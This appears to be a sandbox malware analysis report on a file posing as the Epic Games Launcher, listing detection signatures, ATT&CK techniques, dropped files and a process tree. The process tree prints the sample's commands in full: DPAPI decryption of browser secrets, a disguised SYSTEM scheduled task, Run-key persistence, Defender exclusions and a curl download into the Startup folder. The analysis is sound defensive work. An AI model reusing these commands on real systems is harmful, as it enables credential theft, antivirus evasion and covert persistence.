88764cf8653f0d4b90285abd6a9784732992f5e9059d3df4c28706163977bdef

Analysis

max time kernel
90s
max time network
125s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
28/01/2024, 18:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

EpicGamesLauncher.exe
Size

154.9MB
MD5

928282456673e0a194360f9d411f165d
SHA1

9820bd055f95d157fdbdc973bfc955c282a18c29
SHA256

5088d3e4c0b15af2cdd00ab98ca1cdd273cce489b7ac610d4ddda1f1f8154b82
SHA512

c71623dd5396c89bf3d163451cb0c47d26181d4e4136c041cc888c78ef770d944a64c505efdbbe94bd09456c5b072845f98d3e5b3bcf68075cacb6bd1dfc1753
SSDEEP

1572864:HCquurbtqKajQe7vqrTU4PrCsdCXrBngPE1cG7VOWe2IkBmUgq3Fd6iU3x6VCdbm:nDAgZi

Score

7^/10

persistence spyware stealer

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation	EpicGamesLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation	cscript.exe

Loads dropped DLL 1 IoCs

pid	Process
4944	EpicGamesLauncher.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EpicGamesLauncher = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EpicGamesLauncher.exe"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
26	discord.com
27	discord.com
28	discord.com
35	discord.com
36	discord.com

An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs

pid	Process
2600	cmd.exe
3716	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4340	schtasks.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery

T1057

pid	Process
1248	tasklist.exe
4248	tasklist.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
2764	reg.exe
3684	reg.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
4632	powershell.exe
4632	powershell.exe
4468	powershell.exe
4468	powershell.exe
1456	powershell.exe
1456	powershell.exe
1456	powershell.exe
1220	powershell.exe
1220	powershell.exe
1220	powershell.exe
4944	EpicGamesLauncher.exe
4944	EpicGamesLauncher.exe

Suspicious use of AdjustPrivilegeToken 40 IoCs

description	pid	Process
Token: SeDebugPrivilege	1248	tasklist.exe
Token: SeDebugPrivilege	4248	tasklist.exe
Token: SeDebugPrivilege	4632	powershell.exe
Token: SeDebugPrivilege	4468	powershell.exe
Token: SeShutdownPrivilege	4944	EpicGamesLauncher.exe
Token: SeCreatePagefilePrivilege	4944	EpicGamesLauncher.exe
Token: SeDebugPrivilege	1456	powershell.exe
Token: SeDebugPrivilege	1220	powershell.exe
Token: SeShutdownPrivilege	4944	EpicGamesLauncher.exe
Token: SeCreatePagefilePrivilege	4944	EpicGamesLauncher.exe
Token: SeShutdownPrivilege	4944	EpicGamesLauncher.exe
Token: SeCreatePagefilePrivilege	4944	EpicGamesLauncher.exe
Token: SeShutdownPrivilege	4944	EpicGamesLauncher.exe
Token: SeCreatePagefilePrivilege	4944	EpicGamesLauncher.exe
Token: SeShutdownPrivilege	4944	EpicGamesLauncher.exe
Token: SeCreatePagefilePrivilege	4944	EpicGamesLauncher.exe
Token: SeShutdownPrivilege	4944	EpicGamesLauncher.exe
Token: SeCreatePagefilePrivilege	4944	EpicGamesLauncher.exe
Token: SeShutdownPrivilege	4944	EpicGamesLauncher.exe
Token: SeCreatePagefilePrivilege	4944	EpicGamesLauncher.exe
Token: SeShutdownPrivilege	4944	EpicGamesLauncher.exe
Token: SeCreatePagefilePrivilege	4944	EpicGamesLauncher.exe
Token: SeShutdownPrivilege	4944	EpicGamesLauncher.exe
Token: SeCreatePagefilePrivilege	4944	EpicGamesLauncher.exe
Token: SeShutdownPrivilege	4944	EpicGamesLauncher.exe
Token: SeCreatePagefilePrivilege	4944	EpicGamesLauncher.exe
Token: SeShutdownPrivilege	4944	EpicGamesLauncher.exe
Token: SeCreatePagefilePrivilege	4944	EpicGamesLauncher.exe
Token: SeShutdownPrivilege	4944	EpicGamesLauncher.exe
Token: SeCreatePagefilePrivilege	4944	EpicGamesLauncher.exe
Token: SeShutdownPrivilege	4944	EpicGamesLauncher.exe
Token: SeCreatePagefilePrivilege	4944	EpicGamesLauncher.exe
Token: SeShutdownPrivilege	4944	EpicGamesLauncher.exe
Token: SeCreatePagefilePrivilege	4944	EpicGamesLauncher.exe
Token: SeShutdownPrivilege	4944	EpicGamesLauncher.exe
Token: SeCreatePagefilePrivilege	4944	EpicGamesLauncher.exe
Token: SeShutdownPrivilege	4944	EpicGamesLauncher.exe
Token: SeCreatePagefilePrivilege	4944	EpicGamesLauncher.exe
Token: SeShutdownPrivilege	4944	EpicGamesLauncher.exe
Token: SeCreatePagefilePrivilege	4944	EpicGamesLauncher.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4944 wrote to memory of 1576	4944	EpicGamesLauncher.exe	88
PID 4944 wrote to memory of 1576	4944	EpicGamesLauncher.exe	88
PID 1576 wrote to memory of 1248	1576	cmd.exe	89
PID 1576 wrote to memory of 1248	1576	cmd.exe	89
PID 4944 wrote to memory of 2384	4944	EpicGamesLauncher.exe	91
PID 4944 wrote to memory of 2384	4944	EpicGamesLauncher.exe	91
PID 4944 wrote to memory of 4960	4944	EpicGamesLauncher.exe	94
PID 4944 wrote to memory of 4960	4944	EpicGamesLauncher.exe	94
PID 4944 wrote to memory of 2600	4944	EpicGamesLauncher.exe	93
PID 4944 wrote to memory of 2600	4944	EpicGamesLauncher.exe	93
PID 2384 wrote to memory of 4792	2384	cmd.exe	97
PID 2384 wrote to memory of 4792	2384	cmd.exe	97
PID 4960 wrote to memory of 4248	4960	cmd.exe	98
PID 4960 wrote to memory of 4248	4960	cmd.exe	98
PID 2600 wrote to memory of 4632	2600	cmd.exe	99
PID 2600 wrote to memory of 4632	2600	cmd.exe	99
PID 4944 wrote to memory of 3716	4944	EpicGamesLauncher.exe	100
PID 4944 wrote to memory of 3716	4944	EpicGamesLauncher.exe	100
PID 3716 wrote to memory of 4468	3716	cmd.exe	103
PID 3716 wrote to memory of 4468	3716	cmd.exe	103
PID 4944 wrote to memory of 2672	4944	EpicGamesLauncher.exe	107
PID 4944 wrote to memory of 2672	4944	EpicGamesLauncher.exe	107
PID 2672 wrote to memory of 4340	2672	cmd.exe	105
PID 2672 wrote to memory of 4340	2672	cmd.exe	105
PID 4944 wrote to memory of 3168	4944	EpicGamesLauncher.exe	104
PID 4944 wrote to memory of 3168	4944	EpicGamesLauncher.exe	104
PID 4944 wrote to memory of 3168	4944	EpicGamesLauncher.exe	104
PID 4944 wrote to memory of 3168	4944	EpicGamesLauncher.exe	104
PID 4944 wrote to memory of 3168	4944	EpicGamesLauncher.exe	104
PID 4944 wrote to memory of 3168	4944	EpicGamesLauncher.exe	104
PID 4944 wrote to memory of 3168	4944	EpicGamesLauncher.exe	104
PID 4944 wrote to memory of 3168	4944	EpicGamesLauncher.exe	104
PID 4944 wrote to memory of 3168	4944	EpicGamesLauncher.exe	104
PID 4944 wrote to memory of 3168	4944	EpicGamesLauncher.exe	104
PID 4944 wrote to memory of 3168	4944	EpicGamesLauncher.exe	104
PID 4944 wrote to memory of 3168	4944	EpicGamesLauncher.exe	104
PID 4944 wrote to memory of 3168	4944	EpicGamesLauncher.exe	104
PID 4944 wrote to memory of 3168	4944	EpicGamesLauncher.exe	104
PID 4944 wrote to memory of 3168	4944	EpicGamesLauncher.exe	104
PID 4944 wrote to memory of 3168	4944	EpicGamesLauncher.exe	104
PID 4944 wrote to memory of 3168	4944	EpicGamesLauncher.exe	104
PID 4944 wrote to memory of 3168	4944	EpicGamesLauncher.exe	104
PID 4944 wrote to memory of 3168	4944	EpicGamesLauncher.exe	104
PID 4944 wrote to memory of 3168	4944	EpicGamesLauncher.exe	104
PID 4944 wrote to memory of 3168	4944	EpicGamesLauncher.exe	104
PID 4944 wrote to memory of 3168	4944	EpicGamesLauncher.exe	104
PID 4944 wrote to memory of 3168	4944	EpicGamesLauncher.exe	104
PID 4944 wrote to memory of 3168	4944	EpicGamesLauncher.exe	104
PID 4944 wrote to memory of 3168	4944	EpicGamesLauncher.exe	104
PID 4944 wrote to memory of 3168	4944	EpicGamesLauncher.exe	104
PID 4944 wrote to memory of 3168	4944	EpicGamesLauncher.exe	104
PID 4944 wrote to memory of 3168	4944	EpicGamesLauncher.exe	104
PID 4944 wrote to memory of 3168	4944	EpicGamesLauncher.exe	104
PID 4944 wrote to memory of 3168	4944	EpicGamesLauncher.exe	104
PID 4944 wrote to memory of 3168	4944	EpicGamesLauncher.exe	104
PID 4944 wrote to memory of 4504	4944	EpicGamesLauncher.exe	109
PID 4944 wrote to memory of 4504	4944	EpicGamesLauncher.exe	109
PID 4504 wrote to memory of 3288	4504	cmd.exe	110
PID 4504 wrote to memory of 3288	4504	cmd.exe	110
PID 4944 wrote to memory of 4996	4944	EpicGamesLauncher.exe	111
PID 4944 wrote to memory of 4996	4944	EpicGamesLauncher.exe	111
PID 3288 wrote to memory of 2464	3288	cscript.exe	113
PID 3288 wrote to memory of 2464	3288	cscript.exe	113
PID 2464 wrote to memory of 2764	2464	cmd.exe	114

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\EpicGamesLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\EpicGamesLauncher.exe"
1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1576
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:1248
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v EpicGamesLauncher /f"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2384
- - C:\Windows\system32\reg.exe
    reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v EpicGamesLauncher /f
    3⤵
    PID:4792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,93,5,165,72,158,86,199,78,170,107,57,171,8,49,161,31,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,192,175,247,102,90,208,4,240,138,90,143,203,80,163,0,13,49,15,225,91,73,243,187,128,250,106,67,220,20,183,238,93,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,202,130,214,178,63,66,10,90,87,20,232,137,138,62,39,164,64,195,193,57,56,16,94,10,230,88,187,206,60,90,135,206,48,0,0,0,124,8,92,113,89,139,235,23,157,133,234,106,177,79,59,186,142,56,17,66,139,112,64,187,31,220,20,216,138,203,176,248,155,15,237,54,185,55,80,119,224,28,129,247,27,19,158,217,64,0,0,0,214,161,169,216,58,203,9,234,138,90,200,179,105,214,227,237,175,233,155,102,99,3,231,126,196,36,170,165,135,39,43,83,255,43,212,63,42,214,50,45,28,119,231,156,71,234,111,148,255,235,64,215,246,231,45,220,57,205,160,239,28,51,231,37), $null, 'CurrentUser')"
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  - Suspicious use of WriteProcessMemory
  PID:2600
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,93,5,165,72,158,86,199,78,170,107,57,171,8,49,161,31,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,192,175,247,102,90,208,4,240,138,90,143,203,80,163,0,13,49,15,225,91,73,243,187,128,250,106,67,220,20,183,238,93,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,202,130,214,178,63,66,10,90,87,20,232,137,138,62,39,164,64,195,193,57,56,16,94,10,230,88,187,206,60,90,135,206,48,0,0,0,124,8,92,113,89,139,235,23,157,133,234,106,177,79,59,186,142,56,17,66,139,112,64,187,31,220,20,216,138,203,176,248,155,15,237,54,185,55,80,119,224,28,129,247,27,19,158,217,64,0,0,0,214,161,169,216,58,203,9,234,138,90,200,179,105,214,227,237,175,233,155,102,99,3,231,126,196,36,170,165,135,39,43,83,255,43,212,63,42,214,50,45,28,119,231,156,71,234,111,148,255,235,64,215,246,231,45,220,57,205,160,239,28,51,231,37), $null, 'CurrentUser')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4632
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4960
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:4248
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,93,5,165,72,158,86,199,78,170,107,57,171,8,49,161,31,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,147,186,255,119,95,163,32,239,108,241,228,171,185,238,69,126,164,58,126,252,186,104,78,252,226,40,240,40,209,84,31,141,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,233,221,103,215,54,135,208,118,201,165,218,71,27,56,205,159,34,193,41,61,232,44,48,86,184,49,132,90,67,155,86,48,0,0,0,93,244,22,199,209,170,222,110,51,245,0,12,158,51,30,191,109,181,10,191,62,213,224,84,172,143,91,96,138,43,155,187,239,7,96,73,207,215,195,250,17,109,171,171,61,181,203,188,64,0,0,0,21,78,251,21,120,144,110,104,151,213,255,237,240,17,18,169,145,25,76,140,241,245,213,152,38,92,79,109,232,124,151,242,197,236,225,74,118,208,79,241,16,17,138,83,248,139,175,197,196,59,108,108,126,58,76,32,112,117,159,82,178,232,154,135), $null, 'CurrentUser')"
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  - Suspicious use of WriteProcessMemory
  PID:3716
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,93,5,165,72,158,86,199,78,170,107,57,171,8,49,161,31,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,147,186,255,119,95,163,32,239,108,241,228,171,185,238,69,126,164,58,126,252,186,104,78,252,226,40,240,40,209,84,31,141,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,233,221,103,215,54,135,208,118,201,165,218,71,27,56,205,159,34,193,41,61,232,44,48,86,184,49,132,90,67,155,86,48,0,0,0,93,244,22,199,209,170,222,110,51,245,0,12,158,51,30,191,109,181,10,191,62,213,224,84,172,143,91,96,138,43,155,187,239,7,96,73,207,215,195,250,17,109,171,171,61,181,203,188,64,0,0,0,21,78,251,21,120,144,110,104,151,213,255,237,240,17,18,169,145,25,76,140,241,245,213,152,38,92,79,109,232,124,151,242,197,236,225,74,118,208,79,241,16,17,138,83,248,139,175,197,196,59,108,108,126,58,76,32,112,117,159,82,178,232,154,135), $null, 'CurrentUser')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4468
- C:\Users\Admin\AppData\Local\Temp\EpicGamesLauncher.exe
  "C:\Users\Admin\AppData\Local\Temp\EpicGamesLauncher.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\EpicGamesLauncher" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1792 --field-trial-handle=1920,i,15820112774290457853,11478009095939111221,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
  2⤵
  PID:3168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "cscript //B //nologo "C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\RunBatHidden.vbs""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4504
- - C:\Windows\system32\cscript.exe
    cscript //B //nologo "C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\RunBatHidden.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:3288
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\CheckEpicGamesLauncher.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2464
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "EpicGamesLauncher" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EpicGamesLauncher.exe" /f
        5⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:2764
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1456
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exemple.exe""
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1220
    - - C:\Windows\system32\reg.exe
        
        reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "EpicGamesLauncher"
        5⤵
        Modifies registry key
        
        PID:3684
    - - C:\Windows\system32\curl.exe
        
        curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exemple.exe" YOUR-DIRECT-DOWNLOAD-HERE
        5⤵
        
        PID:224
- C:\Users\Admin\AppData\Local\Temp\EpicGamesLauncher.exe
  "C:\Users\Admin\AppData\Local\Temp\EpicGamesLauncher.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\EpicGamesLauncher" --mojo-platform-channel-handle=2108 --field-trial-handle=1920,i,15820112774290457853,11478009095939111221,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
  2⤵
  PID:4996

C:\Windows\system32\schtasks.exe
schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
1⤵
- Creates scheduled task(s)
PID:4340

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
f48896adf9a23882050cdff97f610a7f

SHA1
4c5a610df62834d43f470cae7e851946530e3086

SHA256
3ae35c2828715a2f9a5531d334a0cfffc81396c2dc058ca42a9943f3cdc22e78

SHA512
16644246f2a35a186fcb5c2b6456ed6a16e8db65ad1383109e06547f9b1f9358f071c30cca541ca4cf7bae66cb534535e88f75f6296a4bfc6c7b22b0684a6ba9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c428399b96e965ae61cee1ba767fd9d9

SHA1
8964316b735c23fca792ba85354eacdd8dbb5e35

SHA256
14053c0f27a0c695462fad737c6b0c9810dce4472835977e9f08bca3ef0f7462

SHA512
5ef32b49b638dca1e5e4adf3c1823a23735c6539d06092e46bdbf97f23b2e4201455ab5e01a019167cd0c80865411ea4fb1e67cc25a3bb58989834a7a34956f7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f0314381ee333795efb86f015c87b7c7

SHA1
d70a44581617e6201726846a23fc71b769cc46da

SHA256
4f5459942b4bf6f19cd373079bd58e2796c94fd3393f77376170fd39e39e37d1

SHA512
56c6074e7e5604e1c76cc147e9d0811195070b01d1979cd620e37bc636a6be3a36f25f3c48ede403f0a4a359b5693ccef9d222a7814fe5cc658c70d732295099

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
353510dff0bdd241051e5b066ea0d884

SHA1
a84ea8d61e491d654fa3265cd5fe31bf2737c1c2

SHA256
aae6f17564f0d5bb849dfac3faf237f3c6dd5aa2b8adc888d2c2dd6ce58fe33a

SHA512
bb6d9c993e93dd816adb0f1ff73a92219823419251acb1cbad626fa8c5070e94b1dd5f1fb77e58bb946e66a2ab4997474fd1a985fb1ba92321def7d8abe4bcd1

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_c1lellvw.pfn.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\a3f723c4-926a-4e06-bd51-fbce19d82b52.tmp.node

Filesize
1.8MB

MD5
3072b68e3c226aff39e6782d025f25a8

SHA1
cf559196d74fa490ac8ce192db222c9f5c5a006a

SHA256
7fb52b781709b065c240b6b81394be6e72e53fe11d7c8e0f7b49dd417eb78a01

SHA512
61ebc72c20195e99244d95af1ab44fa06201a1aee2b5da04490fdc4312e8324a40b0e15a7b42fab5179753d767c1d08ae1a7a56ac71a6e100e63f83db849ee61

Download Submit
C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\CheckEpicGamesLauncher.bat

Filesize
1KB

MD5
c18c10cb23ca6e5490be6eb2fb1a1ddc

SHA1
4a3082ddd4851da7db0b8527c31b2ba23877c011

SHA256
a58332b95f300a9b5d1309bfc18e5b97b59c1b94145064aeedaf6e9718022b9d

SHA512
537462aebe04acd652f310c684b2b562d72665f2b379b830ff15f069603f3ff0229ea65504f0e53f3cb983eeae1de01c4c0518281fe31cef5a890eecc4e2b1bb

Download Submit
C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\RunBatHidden.vbs

Filesize
167B

MD5
323e6511a0f7e82c511ea954d1530b13

SHA1
8b167e573b0663d1bc5a60f0d7b3f267f0bc1a20

SHA256
48a92c93fb07c8f059e0622ce2a95e32726d02fcb23f7bfb384374e636518597

SHA512
757163f84f9352bef973c6a7a994dc4a8492d224820ca5c86e572ed67b3bbe6049444d2a07b08c9efd4bb59b9e5e52ba3fdd397f01f55ddfcf3a5ae3d07ebf6a

Download Submit
memory/1220-84-0x00000276666C0000-0x00000276666D0000-memory.dmp

Filesize
64KB

Download
memory/1220-83-0x00000276666C0000-0x00000276666D0000-memory.dmp

Filesize
64KB

Download
memory/1220-82-0x00007FF906850000-0x00007FF907311000-memory.dmp

Filesize
10.8MB

Download
memory/1220-86-0x00007FF906850000-0x00007FF907311000-memory.dmp

Filesize
10.8MB

Download
memory/1456-71-0x00007FF906850000-0x00007FF907311000-memory.dmp

Filesize
10.8MB

Download
memory/1456-68-0x0000025A2DA40000-0x0000025A2DA50000-memory.dmp

Filesize
64KB

Download
memory/1456-69-0x0000025A2DA40000-0x0000025A2DA50000-memory.dmp

Filesize
64KB

Download
memory/1456-67-0x00007FF906850000-0x00007FF907311000-memory.dmp

Filesize
10.8MB

Download
memory/4468-35-0x00007FF907FE0000-0x00007FF908AA1000-memory.dmp

Filesize
10.8MB

Download
memory/4468-41-0x00007FF907FE0000-0x00007FF908AA1000-memory.dmp

Filesize
10.8MB

Download
memory/4468-36-0x000001FD9EC30000-0x000001FD9EC40000-memory.dmp

Filesize
64KB

Download
memory/4468-37-0x000001FD9EC30000-0x000001FD9EC40000-memory.dmp

Filesize
64KB

Download
memory/4632-23-0x00007FF908330000-0x00007FF908DF1000-memory.dmp

Filesize
10.8MB

Download
memory/4632-19-0x0000017079D50000-0x0000017079DA0000-memory.dmp

Filesize
320KB

Download
memory/4632-18-0x0000017077890000-0x00000170778A0000-memory.dmp

Filesize
64KB

Download
memory/4632-17-0x0000017077890000-0x00000170778A0000-memory.dmp

Filesize
64KB

Download
memory/4632-16-0x00007FF908330000-0x00007FF908DF1000-memory.dmp

Filesize
10.8MB

Download
memory/4632-6-0x000001705F340000-0x000001705F362000-memory.dmp

Filesize
136KB

Download